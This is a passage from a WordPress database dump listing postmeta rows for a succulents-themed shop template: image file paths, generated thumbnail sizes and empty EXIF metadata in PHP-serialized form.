ime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(720,1164,'_wp_attachment_image_alt','a'),(721,1171,'_wp_attachment_image_alt','a'),(722,1536,'_wp_attached_file','2018/01/h7-img-3.jpg'),(723,1536,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:20:\"2018/01/h7-img-3.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h7-img-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h7-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h7-img-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h7-img-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h7-img-3-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h7-img-3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"h7-img-3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:20:\"h7-img-3-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:20:\"h7-img-3-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h7-img-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h7-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(724,3232,'_wp_attached_file','2018/02/h3-slide1-graphic12.png'),(725,3232,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:246;s:6:\"height\";i:100;s:4:\"file\";s:31:\"2018/02/h3-slide1-graphic12.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h3-slide1-graphic12-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h3-slide1-graphic12-150x100.png\";s:5:\"width\";i:150;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h3-slide1-graphic12-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(726,3232,'_wp_attachment_image_alt',''),(727,1172,'_wp_attached_file','2018/01/product4-gallery2.jpg'),(728,1172,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/01/product4-gallery2.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"product4-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"product4-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"product4-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"product4-gallery2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"product4-gallery2-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"product4-gallery2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"product4-gallery2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"product4-gallery2-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"product4-gallery2-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"product4-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"product4-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(729,4228,'_wp_attachment_image_alt','a'),(730,4232,'_wp_attachment_context','site-icon'),(731,3234,'_wp_attached_file','2018/02/h3-slide1-graphic2-1.png'),(732,3234,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1021;s:6:\"height\";i:312;s:4:\"file\";s:32:\"2018/02/h3-slide1-graphic2-1.png\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"h3-slide1-graphic2-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"h3-slide1-graphic2-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:32:\"h3-slide1-graphic2-1-600x183.png\";s:5:\"width\";i:600;s:6:\"height\";i:183;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h3-slide1-graphic2-1-300x92.png\";s:5:\"width\";i:300;s:6:\"height\";i:92;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"h3-slide1-graphic2-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"h3-slide1-graphic2-1-768x235.png\";s:5:\"width\";i:768;s:6:\"height\";i:235;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:32:\"h3-slide1-graphic2-1-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:32:\"h3-slide1-graphic2-1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:32:\"h3-slide1-graphic2-1-550x312.png\";s:5:\"width\";i:550;s:6:\"height\";i:312;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:32:\"h3-slide1-graphic2-1-550x312.png\";s:5:\"width\";i:550;s:6:\"height\";i:312;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:32:\"h3-slide1-graphic2-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:32:\"h3-slide1-graphic2-1-600x183.png\";s:5:\"width\";i:600;s:6:\"height\";i:183;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"h3-slide1-graphic2-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(733,838,'_wp_attachment_image_alt','a'),(734,839,'_wp_attachment_image_alt','a'),(735,3227,'_wp_attachment_image_alt','o'),(736,3229,'_wp_attachment_image_alt',''),(737,3231,'_wp_attachment_image_alt','o'),(738,3232,'_wp_attachment_image_alt',''),(739,3234,'_wp_attachment_image_alt',''),(740,4234,'_wp_attached_file','2018/03/landing-home1-img-1.jpg'),(741,4234,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:472;s:4:\"file\";s:31:\"2018/03/landing-home1-img-1.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"landing-home1-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-home1-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"landing-home1-img-1-600x354.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"landing-home1-img-1-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-home1-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"landing-home1-img-1-768x453.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:453;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"landing-home1-img-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"landing-home1-img-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"landing-home1-img-1-550x472.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"landing-home1-img-1-550x472.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"landing-home1-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"landing-home1-img-1-600x354.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-home1-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(742,861,'_wp_attached_file','2018/01/h5-img-3.jpg'),(743,861,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:674;s:6:\"height\";i:450;s:4:\"file\";s:20:\"2018/01/h5-img-3.jpg\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h5-img-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"h5-img-3-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h5-img-3-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h5-img-3-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h5-img-3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"h5-img-3-550x450.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:20:\"h5-img-3-550x450.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h5-img-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"h5-img-3-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(744,3235,'_wp_attached_file','2018/02/h3-slide1-graphic5.png'),(745,3235,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:319;s:6:\"height\";i:134;s:4:\"file\";s:30:\"2018/02/h3-slide1-graphic5.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"h3-slide1-graphic5-300x134.png\";s:5:\"width\";i:300;s:6:\"height\";i:134;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic5-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic5-300x126.png\";s:5:\"width\";i:300;s:6:\"height\";i:126;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic5-150x134.png\";s:5:\"width\";i:150;s:6:\"height\";i:134;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic5-300x134.png\";s:5:\"width\";i:300;s:6:\"height\";i:134;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"h3-slide1-graphic5-300x134.png\";s:5:\"width\";i:300;s:6:\"height\";i:134;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic5-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(746,798,'_wp_attachment_image_alt','o'),(747,811,'_wp_attachment_image_alt','o'),(748,838,'_wp_attachment_image_alt','a'),(749,839,'_wp_attachment_image_alt','a'),(750,861,'_wp_attachment_image_alt','o'),(751,3505,'_wp_attachment_image_alt','o'),(752,3509,'_wp_attachment_image_alt','o'),(753,862,'_wp_attached_file','2018/01/h5-img-4.jpg'),(754,862,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:467;s:6:\"height\";i:450;s:4:\"file\";s:20:\"2018/01/h5-img-4.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h5-img-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h5-img-4-300x289.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:289;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h5-img-4-467x300.jpg\";s:5:\"width\";i:467;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h5-img-4-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h5-img-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(755,3510,'_wp_attached_file','2018/02/landing-brown-3.png'),(756,3510,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:453;s:6:\"height\";i:480;s:4:\"file\";s:27:\"2018/02/landing-brown-3.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"landing-brown-3-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"landing-brown-3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"landing-brown-3-283x300.png\";s:5:\"width\";i:283;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"landing-brown-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:27:\"landing-brown-3-453x300.png\";s:5:\"width\";i:453;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:27:\"landing-brown-3-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:27:\"landing-brown-3-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"landing-brown-3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(757,1171,'_wp_attachment_image_alt','a'),(758,1172,'_wp_attachment_image_alt','a'),(759,3235,'_wp_attachment_image_alt','o'),(760,1172,'_wp_attachment_image_alt','a'),(761,1173,'_wp_attached_file','2018/01/product4-gallery3.jpg'),(762,1173,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/01/product4-gallery3.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"product4-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"product4-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"product4-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"product4-gallery3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"product4-gallery3-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"product4-gallery3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"product4-gallery3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"product4-gallery3-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"product4-gallery3-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"product4-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"product4-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s: